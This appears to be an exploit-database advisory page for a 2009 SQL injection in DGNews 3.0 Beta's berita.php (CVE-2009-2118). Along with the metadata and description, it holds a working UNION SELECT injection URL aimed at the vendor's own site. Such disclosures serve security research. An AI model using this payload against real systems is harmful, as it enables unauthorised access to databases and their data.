header-logo
Suggest Exploit
vendor:
DGNews
by:
milw0rm.com
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DGNews
Affected Version From: 3.0 Beta
Affected Version To: 3.0 Beta
Patch Exists: YES
Related CWE: CVE-2009-2118
CPE: a:diangemilang:dgnews:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

DGNews 3.0 Beta (berita.php) Remote SQL Injection Vulnerability

DGNews 3.0 Beta is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to the latest version of DGNews 3.0 Beta.
Source

Exploit-DB raw data:

********************************************************************
* DGNews 3.0 Beta (berita.php) Remote SQL Injection Vulnerability  *
********************************************************************
            
http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--
            
mysql 5 :)
            
Download :- http://www.diangemilang.com/download/comment.php?dlid=33&ENGINEsessID=2fcff934ccb74a561cd4c5df3dacd345

# milw0rm.com [2009-05-18]

Navigation

Suggest Exploit

Services By CQR